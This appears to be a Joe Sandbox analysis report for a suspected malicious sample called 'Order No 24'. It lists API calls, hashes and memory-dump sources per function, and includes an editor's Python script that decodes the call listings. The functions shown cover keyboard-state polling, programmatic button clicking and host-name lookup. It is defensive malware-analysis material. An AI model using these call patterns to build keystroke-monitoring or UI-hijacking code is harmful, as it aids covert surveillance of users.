• Sleep.KERNEL32(0000000A), ref: 009C77C0
• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009C77E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 009C7806
• SetActiveWindow.USER32 ref: 009C7825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009C7833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 009C7852
• Sleep.KERNEL32(000000FA), ref: 009C785D
• IsWindow.USER32 ref: 009C7869
• EndDialog.USER32(00000000), ref: 009C787A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 47c245c66966cbe41b558bbf0c03b12953ba49dc722ccadf0938fe157a3d2336
• Instruction ID: 53e20495ac89392b187b44308b2a34250375c1e84c42b4531877c2b7be117459
• Opcode Fuzzy Hash: 47c245c66966cbe41b558bbf0c03b12953ba49dc722ccadf0938fe157a3d2336
• Instruction Fuzzy Hash: BD213EBA604209AFEB019FE0ECC9F2A7F79FB85348F000018F50596162DB626D13DE22
APIs
  • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
  • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
• CoInitialize.OLE32(00000000), ref: 009D034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009D03DE
• SHGetDesktopFolder.SHELL32(?), ref: 009D03F2
• CoCreateInstance.OLE32(00A0DA8C,00000000,00000001,00A33CF8,?), ref: 009D043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009D04AD
• CoTaskMemFree.OLE32(?,?), ref: 009D0505
• _memset.LIBCMT ref: 009D0542
• SHBrowseForFolderW.SHELL32(?), ref: 009D057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009D05A1
• CoTaskMemFree.OLE32(00000000), ref: 009D05A8
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009D05DF
• CoUninitialize.OLE32(00000001,00000000), ref: 009D05E1
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 5a74b70c8eb54b6b9a1ffdf691b0501220801b4a09a33cbb8e8f4faa9b0c7fdd
• Instruction ID: a2a08c99493c9f980865583f0bddf9f1420b371a85e02abd0dd9ea7e5cddd7dd
• Opcode Fuzzy Hash: 5a74b70c8eb54b6b9a1ffdf691b0501220801b4a09a33cbb8e8f4faa9b0c7fdd
• Instruction Fuzzy Hash: FDB1B775A00209AFDB04DFA4D889EAEBBB9AF88304F148459F919EB351DB30ED45CB50
APIs
• GetKeyboardState.USER32(?), ref: 009C2ED6
• SetKeyboardState.USER32(?), ref: 009C2F41
• GetAsyncKeyState.USER32(000000A0), ref: 009C2F61
• GetKeyState.USER32(000000A0), ref: 009C2F78
• GetAsyncKeyState.USER32(000000A1), ref: 009C2FA7
• GetKeyState.USER32(000000A1), ref: 009C2FB8
• GetAsyncKeyState.USER32(00000011), ref: 009C2FE4
• GetKeyState.USER32(00000011), ref: 009C2FF2
• GetAsyncKeyState.USER32(00000012), ref: 009C301B
• GetKeyState.USER32(00000012), ref: 009C3029
• GetAsyncKeyState.USER32(0000005B), ref: 009C3052
• GetKeyState.USER32(0000005B), ref: 009C3060
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 8d6ebf7654ff4059dc1189d1768950b77223ca289e41b8149608731b1698a0ef
• Instruction ID: adeedbbdc90c85658af4f753157ff580513416a319f17dfe05db6b23b4be720f
• Opcode Fuzzy Hash: 8d6ebf7654ff4059dc1189d1768950b77223ca289e41b8149608731b1698a0ef
• Instruction Fuzzy Hash: BD51A565E0879829FB35DBA48811FEABBB85F11340F08C59DD5C25B1C2DA949B8CC7A3
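The two "APIs" listings above (the dialog-handling routine whose calls start at 009C7794, with timeGetTime/Sleep around EnumThreadWindows, FindWindowExW("BUTTON") and two SendMessageW calls, and the key-state routine starting at 009C2ED6 that pairs GetAsyncKeyState with GetKeyState for five virtual-key codes) are easier to read once the raw hex arguments are named. The script below is an added example by the editor, not part of the Joe Sandbox report or its IDA plugin: it parses bullet lines in exactly the report's format, names the documented winuser.h constants that occur here (0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN, 0x00F5 BM_CLICK, 0x0010 WM_CLOSE), and tags each function with coarse capabilities. The sample listings embedded in the script are copied from the two functions above; the capability tags, the by-value matching of message ids and the helper names are the editor's own assumptions, not output of the sandbox's signature engine.

```python
"""Decode Joe Sandbox per-function "APIs" listings into an annotated call trace.

Added example (not part of the Joe Sandbox report). Parses lines such as
    • GetAsyncKeyState.USER32(000000A0), ref: 009C2F61
    • Part of subcall function 0099DC38: timeGetTime.WINMM(?,7694B400,009F58AB), ref: 0099DC3C
and names the Win32 constants seen in this report so the call sequence reads
as intent (VK_LSHIFT, BM_CLICK, WM_CLOSE) rather than raw hex.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Documented winuser.h values; only the ones used by the listings in this report.
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
            0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MSG_NAMES = {0x00F5: "BM_CLICK", 0x0010: "WM_CLOSE"}
TIMING_APIS = {"timeGetTime", "GetTickCount", "QueryPerformanceCounter"}
KEYSTATE_APIS = {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}

# One bullet of the "APIs" list: optional subcall prefix, Api.MODULE, optional
# "(args)", then "ref: <addr>" (the comma before "ref" is absent when no args are shown).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list                         # argument tokens exactly as the sandbox printed them
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines

    def decoded(self) -> str:
        return f"{self.api}({', '.join(decode_arg(self.api, i, a) for i, a in enumerate(self.args))})"


def parse_hex(tok: str) -> Optional[int]:
    """'000000A0' -> 160, '-00000005' -> -5; '?', 'BUTTON', 'Function_...' -> None."""
    tok = tok.strip()
    body = tok[1:] if tok.startswith("-") else tok
    if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", body):
        return None
    return -int(body, 16) if tok.startswith("-") else int(body, 16)


def decode_arg(api: str, index: int, tok: str) -> str:
    v = parse_hex(tok)
    if v is None:
        return tok.strip()
    if api in ("GetAsyncKeyState", "GetKeyState") and index == 0:
        return VK_NAMES.get(v, f"VK_0x{v:02X}")
    if api.startswith("SendMessage") and v in MSG_NAMES:
        # The sandbox's argument list is a best-effort stack reconstruction and
        # sometimes drops the leading hwnd (compare the two SendMessageW lines in
        # the report), so the message id is matched by value, not by position.
        # Assumption: no other SendMessage argument here equals 0x10 or 0xF5.
        return MSG_NAMES[v]
    if api == "Sleep" and index == 0:
        return f"{v} ms"
    return f"0x{v:X}"


def parse_listing(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:          # "APIs", "Strings", memory-dump metadata: not a call
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


def probed_keys(calls: list) -> list:
    """Virtual keys the function polls, in first-seen order."""
    seen = []
    for c in calls:
        if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args:
            name = decode_arg(c.api, 0, c.args[0])
            if name not in seen:
                seen.append(name)
    return seen


def capabilities(calls: list) -> set:
    """Coarse tags (editor's heuristics, not Joe Sandbox signatures)."""
    apis = {c.api for c in calls}
    tags = set()
    if apis & TIMING_APIS and "Sleep" in apis:
        tags.add("execution timing (timer + Sleep)")
    if apis & KEYSTATE_APIS:
        tags.add("keyboard state probing")
    if any(c.api.startswith("SendMessage") and any(parse_hex(a) in MSG_NAMES for a in c.args)
           for c in calls):
        tags.add("window control via SendMessage")
    return tags


# Sample input: the two "APIs" listings copied from this report.
SAMPLE_DIALOG = """APIs
• timeGetTime.WINMM ref: 009C7794
  • Part of subcall function 0099DC38: timeGetTime.WINMM(?,7694B400,009F58AB), ref: 0099DC3C
• Sleep.KERNEL32(0000000A), ref: 009C77C0
• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009C77E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 009C7806
• SetActiveWindow.USER32 ref: 009C7825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009C7833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 009C7852
• Sleep.KERNEL32(000000FA), ref: 009C785D
• IsWindow.USER32 ref: 009C7869
• EndDialog.USER32(00000000), ref: 009C787A
"""
SAMPLE_KEYS = """• GetKeyboardState.USER32(?), ref: 009C2ED6
• SetKeyboardState.USER32(?), ref: 009C2F41
• GetAsyncKeyState.USER32(000000A0), ref: 009C2F61
• GetKeyState.USER32(000000A0), ref: 009C2F78
• GetAsyncKeyState.USER32(000000A1), ref: 009C2FA7
• GetKeyState.USER32(000000A1), ref: 009C2FB8
• GetAsyncKeyState.USER32(00000011), ref: 009C2FE4
• GetKeyState.USER32(00000011), ref: 009C2FF2
• GetAsyncKeyState.USER32(00000012), ref: 009C301B
• GetKeyState.USER32(00000012), ref: 009C3029
• GetAsyncKeyState.USER32(0000005B), ref: 009C3052
• GetKeyState.USER32(0000005B), ref: 009C3060
"""

if __name__ == "__main__":
    for name, text in (("function at 009C7794", SAMPLE_DIALOG), ("function at 009C2ED6", SAMPLE_KEYS)):
        calls = parse_listing(text)
        print(name, sorted(capabilities(calls)), probed_keys(calls))
        for c in calls:
            print(f"  {c.ref:08X} {'  ' if c.subcall_of else ''}{c.decoded()}")
```

Run as a script it prints each call site with named arguments, e.g. `009C7833 SendMessageW(0x0, BM_CLICK, 0x0, 0x0)` followed by `009C7852 SendMessageW(WM_CLOSE, 0x0, 0x0)`, which is what makes the first function recognisable as "find a BUTTON child, click it, close the window, wait, EndDialog" rather than a list of handles. The key-state function resolves to the five modifier keys (left/right Shift, Ctrl, Alt, left Win) polled by both GetAsyncKeyState and GetKeyState, a pattern to keep in mind when the report's "keyboard" findings are weighed against the sample's other behaviour.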
APIs
• GetDlgItem.USER32(?,00000001), ref: 009BED1E
• GetWindowRect.USER32(00000000,?), ref: 009BED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009BED8E
• GetDlgItem.USER32(?,00000002), ref: 009BED99
• GetWindowRect.USER32(00000000,?), ref: 009BEDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009BEE01
• GetDlgItem.USER32(?,000003E9), ref: 009BEE0F
• GetWindowRect.USER32(00000000,?), ref: 009BEE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009BEE63
• GetDlgItem.USER32(?,000003EA), ref: 009BEE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009BEE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 009BEE9B
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: c93006b8b04127241b4566acccfe62eaf436495ae73aa7cf9ec0bdd6b6295a9b
• Instruction ID: 0aaa43c25fdec5c40c032c82208d8e9395215d5e749e761fc5e47b1a29f84123
• Opcode Fuzzy Hash: c93006b8b04127241b4566acccfe62eaf436495ae73aa7cf9ec0bdd6b6295a9b
• Instruction Fuzzy Hash: 68511171B10209AFDB18CFA9DD99AAEBBBAFB88710F14812DF519D7290D771DD018B10
APIs
  • Part of subcall function 0099B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0099B759,?,00000000,?,?,?,?,0099B72B,00000000,?), ref: 0099BA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099B72B), ref: 0099B7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 0099B88D
• DestroyAcceleratorTable.USER32(00000000), ref: 009FD8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD90A
• DeleteObject.GDI32(00000000), ref: 009FD91C
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: ffde16b8d951e87e7f21bc6320f2747c5ec6b6498de57bf8aa589af8a56b45d0
• Instruction ID: c84c90877f47d5d7f55201850cb3804c9a6dbe62dacdbd37ed98d3d7c60f09b0
• Opcode Fuzzy Hash: ffde16b8d951e87e7f21bc6320f2747c5ec6b6498de57bf8aa589af8a56b45d0
• Instruction Fuzzy Hash: 0E61DC39502604DFDF25DF99EA88B35B7FAFF85312F150519E14686A70C779A8C2CB40
APIs
  • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
• GetSysColor.USER32(0000000F), ref: 0099B438
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: c855533861af610b58446e0608e433e376b7732e3d5320c555bc951d7536b4d6
• Instruction ID: 37d6f6a8775c1e8067b976ae15d5a2937b959b7bad3aa5f75e90089e34986812
                                                                                                                                  • Opcode Fuzzy Hash: c855533861af610b58446e0608e433e376b7732e3d5320c555bc951d7536b4d6
                                                                                                                                  • Instruction Fuzzy Hash: 2D41A3351011089BEF209FACED89BB93B6AAB46731F144365FE658A1F6D7348C42E721
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: a0b6364969e7db60eaa579af2f8bc3b3ade750042c6e544a49bef1c3682ad833
• Instruction ID: c462155a841601a6723d971ece8441b98e550fd7948a056a733a8733e2be8fba
• Opcode Fuzzy Hash: a0b6364969e7db60eaa579af2f8bc3b3ade750042c6e544a49bef1c3682ad833
• Instruction Fuzzy Hash: 2341117784521CAECF61DB94CC45EDF73BCEB85310F0041A6B659A2051EB30ABE58F91
APIs
• CharLowerBuffW.USER32(00A1DC00,00A1DC00,00A1DC00), ref: 009CD7CE
• GetDriveTypeW.KERNEL32(?,00A33A70,00000061), ref: 009CD898
• _wcscpy.LIBCMT ref: 009CD8C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 32ddf1728cd2e810751ae04ca0a82f09f4545aaf38ef5b225bacecdd4c01fab9
• Instruction ID: 9a270c8c1b6d36d5288143b834ef689e52ff9d7c9a430613ed1828b825688ead
• Opcode Fuzzy Hash: 32ddf1728cd2e810751ae04ca0a82f09f4545aaf38ef5b225bacecdd4c01fab9
• Instruction Fuzzy Hash: 3A516E75909300AFCB00EF14D892FAAB7A5FFC4354F10892DF59A572A2EB31DA05CB42
APIs
• __swprintf.LIBCMT ref: 009893AB
• __itow.LIBCMT ref: 009893DF
  • Part of subcall function 009A1557: _xtow@16.LIBCMT ref: 009A1578
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
• Opcode ID: 40c566a50faf67bf59a9394635578d434b58c0bb527b33f4f6a609b006c3096b
• Instruction ID: 0f2ce39df7d601cdba6ea408387640eebe7a7f3db81c471a444fa27aa0b7efe4
• Opcode Fuzzy Hash: 40c566a50faf67bf59a9394635578d434b58c0bb527b33f4f6a609b006c3096b
• Instruction Fuzzy Hash: 8D41DA71504208ABDB24EB74D941FBA77E8EF85310F24486FF18AD72D1EA35D941CB50
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009EA259
• CreateCompatibleDC.GDI32(00000000), ref: 009EA260
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009EA273
• SelectObject.GDI32(00000000,00000000), ref: 009EA27B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 009EA286
• DeleteDC.GDI32(00000000), ref: 009EA28F
• GetWindowLongW.USER32(?,000000EC), ref: 009EA299
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009EA2AD
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009EA2B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
• Instruction ID: cec5ed216dde8edf8a7fd18429379bb42b2db8acfcc964bb9baf45337fcc51ed
• Opcode Fuzzy Hash: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
• Instruction Fuzzy Hash: 8D316F32100159ABDF129FE5DC49FEA3B6DFF19360F110214FA29A61A0CB36EC12DB65
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2620052-3771769585
• Opcode ID: fd73908af1320df2d01ccd165f0789773b9fbfc4c5d554de6838d8d774ba6014
• Instruction ID: e2c57eca994ec47e9d994e15a8472e084a119cd4699b32b63a2585460ef10b88
• Opcode Fuzzy Hash: fd73908af1320df2d01ccd165f0789773b9fbfc4c5d554de6838d8d774ba6014
• Instruction Fuzzy Hash: 26110A72904219BBDB25ABB4AC09FDA77BCEF85710F00006DF04596081EF70DE868B92
APIs
• _memset.LIBCMT ref: 009A5047
  • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
• __gmtime64_s.LIBCMT ref: 009A50E0
• __gmtime64_s.LIBCMT ref: 009A5116
• __gmtime64_s.LIBCMT ref: 009A5133
• __allrem.LIBCMT ref: 009A5189
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51A5
• __allrem.LIBCMT ref: 009A51BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51DA
• __allrem.LIBCMT ref: 009A51F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A520F
• __invoke_watson.LIBCMT ref: 009A5280
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction ID: 60364858a8a8b071236c6e572301140b0c0621166099c9658600ba6c88d0d565
• Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction Fuzzy Hash: 0C71E672B00F16ABE7149F78CC91BAAB3A8AF52774F164229F914D7681E770DD408BD0
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C4DF8
                                                                                                                                  • GetMenuItemInfoW.USER32(00A41708,000000FF,00000000,00000030), ref: 009C4E59
                                                                                                                                  • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C4E8F
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 009C4EA1
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 009C4EE5
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 009C4F01
                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 009C4F2B
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 009C4F70
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009C4FB6
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FCA
                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FEB
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
